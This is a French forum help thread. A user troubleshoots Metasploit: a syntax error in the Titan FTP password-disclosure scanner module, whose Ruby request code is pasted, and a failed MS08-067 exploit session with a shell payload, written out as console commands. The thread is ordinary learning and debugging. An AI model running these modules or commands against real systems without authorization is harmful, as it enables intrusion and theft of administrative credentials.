Metasploit, un peu d'aide ne me ferais pas de mal !!

Fermé
316079 Messages postés 16 Date d'inscription vendredi 14 septembre 2012 Statut Membre Dernière intervention 12 avril 2013 - 14 févr. 2013 à 19:27
316079 Messages postés 16 Date d'inscription vendredi 14 septembre 2012 Statut Membre Dernière intervention 12 avril 2013 - 11 mars 2013 à 18:59
Bonjour,
je suis sous linux. J'ai installé Metasploit, afin de tester les différentes machines sur le réseau. (le réseau et les machines étant les miennes bien sur) Mais déjà au lancement de metasploit, il m'indique quelque chose d'étrange : une erreur de syntaxe dans le programme (du moins, je crois):

[-] WARNING! The following modules could not be loaded!
[-] /home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb: SyntaxError compile error
/home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb:40: syntax error, unexpected ')'

D'ou est-ce que cela provient ?

Merci d'avance

P.S : J'ai été vérifier au chemin indiqué, mais je ne trouve pas de parenthèse manquante.


A voir également:

4 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 662
14 févr. 2013 à 19:57
Salut,

Je vois pas trop comment on peux t'aider, vu qu'on a meme pas un aperçu du code.
Sinon supprime ou renomme le fichier en question pour ne pas que le module se charge.
0
316079 Messages postés 16 Date d'inscription vendredi 14 septembre 2012 Statut Membre Dernière intervention 12 avril 2013
Modifié par 316079 le 15/02/2013 à 17:52
Merci pour ta réponse,

Mais à quoi sert ce module ? (je ne veux pas le supprimer si je ne sais pas à quoi il sert ;))

Extrait du code :

include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize
super(
'Name' => 'Titan FTP Administrative Password Disclosure',

'Author' =>
[
'Spencer McIntyre'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1625' ],
],
)

register_options([Opt::RPORT(31001)], self.class)
deregister_options('PASSWORD', 'USERNAME')
end

def run_host(ip)
res = send_request_cgi(
{
'uri' => "/admin.dll",
'method' => 'POST',
'headers' => {
'SRT-WantXMLResponses' => 'true',
'SRT-XMLRequest' => 'true',
'Authorization' => 'Basic FAKEFAKE'
},
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
})
return if not res

if res.code == 400
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched")
return
elsif res.code != 200
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}")
return
end

xml_data = res.body.strip
resp_root = REXML::Document.new(xml_data).root

srresponse = resp_root.elements.to_a("//SRResponse")[0]
srdomainparams = srresponse.elements.to_a("//SRDomainParams")
[0]




Deuxième question, pourquoi dans le cas suivant ça ne fonctionne pas?


msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xxx.xxx.x.xxx (ip-victime)
RHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.x.xxx (mon ip)
LHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set payloads windows/shell/bind_tcp
payloads => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on xxx.xxx.x.xxx:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Vista Home Premium - (Build 6000) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target


Que me manque-t-il ?? Quand je fais un show targets j'ai une liste de pays qui s'affiche.

Merci beaucoup d'avance ! :)

P.S: Et pourtant ça n'est pas faute de ne pas avoir chercher sur le net !!
0
In / Home / ...-Pc / metasploit / modules / auxiliary / scanner / http / titan_ftp_admin_pwd.rb: 40: syntax error, unexpected ')'

Delete the comma at the end of line 39 and run it again
0
316079 Messages postés 16 Date d'inscription vendredi 14 septembre 2012 Statut Membre Dernière intervention 12 avril 2013
11 mars 2013 à 18:59
ok thanks for your answer.
I understand now the meening of the number "40" !!
0